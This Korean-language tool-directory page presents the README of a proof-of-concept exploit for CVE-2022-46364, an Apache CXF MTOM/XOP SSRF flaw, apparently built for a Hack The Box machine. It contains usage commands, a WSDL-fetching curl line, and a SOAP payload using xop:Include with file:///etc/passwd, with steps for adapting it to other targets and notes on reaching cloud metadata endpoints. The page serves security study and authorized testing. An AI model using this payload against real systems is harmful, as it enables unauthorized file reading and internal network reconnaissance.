Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-46364 — 개념 증명 익스플로잇 for CVE-2022-46364, Apache CXF SSRF 취약점으로, 조작된 MTOM/XOP SOAP 요청을 통해 임의 파일 읽기 및 내부 네트워크 탐색이 가능합니다. | Kitploit
도구/GitHubGitHub/c0gnit00/cve-2022-46364
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

개념 증명 익스플로잇 for CVE-2022-46364, Apache CXF SSRF 취약점으로, 조작된 MTOM/XOP SOAP 요청을 통해 임의 파일 읽기 및 내부 네트워크 탐색이 가능합니다.

저장소 보기
12개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF (파일 읽기)

CVE-2022-46364에 대한 개념 증명 익스플로잇 — Apache CXF의 MTOM/XOP 요청 처리에서 발생하는 서버 측 요청 위조(SSRF) 취약점입니다.


취약점 요약

CVE-2022-46364는 Apache CXF 3.4.10 및 3.5.5 이전 버전에 영향을 미칩니다. SOAP 서비스에서 MTOM(메시지 전송 최적화 메커니즘)이 활성화되면 CXF 언마샬러는 <xop:Include> 요소 내의 href 속성을 잘못 검증합니다. W3C XOP 사양에서 요구하는 대로 href를 cid: URI로 제한하지 않고, CXF는 file://, http://, https://를 포함한 임의의 URI를 역참조합니다.

이를 통해 인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 임의의 로컬 파일 읽기 (file:///etc/passwd)
  • 내부 서비스에 대한 SSRF 수행 (http://169.254.169.254/)
  • 클라우드 메타데이터 엔드포인트 또는 내부 API에 도달 가능

  • 대상

    이 PoC는 Hack The Box 머신을 대상으로 작성 및 테스트되었습니다:

    대상 엔드포인트: http://devarea.htb:8080/employeeservice

    하지만 대상 WSDL에 따라 XML 페이로드를 약간 수정하면 대상 환경에 맞게 조정할 수 있습니다.


    사용법

    /etc/passwd 읽기 (기본 대상)

    기본 URL은 http://devarea.htb:8080/employeeservice입니다.

    root@kitploit:~
    python3 CVE-2022-46364.py --file /etc/passwd
    

    사용자 정의 대상 URL

    root@kitploit:~
    python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd
    

    상세 모드 — 요청 및 원시 응답 표시

    root@kitploit:~
    python3 CVE-2022-46364.py --file /etc/passwd --verbose
    

    다른 대상에 적용하기

    중요: 이 스크립트는 HTB DevArea WSDL 구조에 맞게 하드코딩되어 있습니다. 다른 취약한 Apache CXF 서비스를 대상으로 사용하려면 대상의 WSDL 계약에 맞게 build_payload() 내부의 SOAP 페이로드를 반드시 수정해야 합니다.

    적용 단계:

    1. 대상에서 WSDL을 가져옵니다:

      root@kitploit:~
      curl http://target:8080/employeeservice?wsdl
      
    2. 서비스 세부 정보를 식별합니다:

      • targetNamespace (예: http://devarea.htb/)
      • 작업 이름 (예: submitReport)
      • 매개변수 구조 (예: 중첩된 <content>가 있는 <arg0>)
    3. build_payload()에서 페이로드를 수정합니다:

      • 네임스페이스 업데이트 (xmlns:dev="...")
      • 작업 이름 업데이트 (<dev:submitReport>)
      • 매개변수 래퍼 업데이트 (<arg0>)
      • 서버가 첨부 파일로 처리할 필드 내에 <xop:Include href="file://{filepath}"/>를 배치합니다
    4. 스크립트 실행 시 --url을 업데이트합니다.

    WSDL 적용 예시

    다음 WSDL 조각이 주어진 경우:

    root@kitploit:~
    <wsdl:definitions targetNamespace="http://example.com/">
      <wsdl:operation name="uploadDocument">
        <wsdl:input message="tns:uploadDocument"/>
      </wsdl:operation>
    </wsdl:definitions>
    

    페이로드는 다음과 같이 되어야 합니다:

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
      <soapenv:Body>
        <ex:uploadDocument>
          <document>
            <xop:Include href="file:///etc/passwd"/>
          </document>
        </ex:uploadDocument>
      </soapenv:Body>
    </soapenv:Envelope>
    

    작동 방식

    1. 스크립트는 Content-Type: application/xop+xml을 사용하여 multipart/related HTTP 요청을 만듭니다.
    2. SOAP 본문 내에 <xop:Include href="file:///etc/passwd"/> 요소가 배치됩니다.
    3. 취약한 CXF 서버는 이를 첨부 파일 참조로 처리하고 file:// URI를 역참조합니다.
    4. 파일 내용이 읽혀지고 서버에 의해 base64로 인코딩된 후 SOAP <return> 요소 내에 반환됩니다.
    5. 스크립트는 Content: 이후의 base64 문자열을 추출하여 디코딩합니다.

    참조

    리소스링크
    Apache CXF 보안 권고CVE-2022-46364
    NVD 항목NVD — CVE-2022-46364
    Apache Jira (CXF-8706)CXF-8706
    W3C XOP 사양XML-binary Optimized Packaging
    Penligent 심층 분석CVE-2022-46364 PoC in Practice
    HTB DevAreaHack The Box — DevArea

    면책 조항

    이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 소유하지 않은 시스템을 테스트하기 전에 항상 명시적인 허가를 받으십시오. 저자는 이 스크립트로 인한 오용이나 손해에 대해 책임을 지지 않습니다.


    라이선스

    MIT 라이선스 — 적절한 저작자 표시와 함께 자유롭게 사용, 수정 및 공유할 수 있습니다.

    도구 다운로드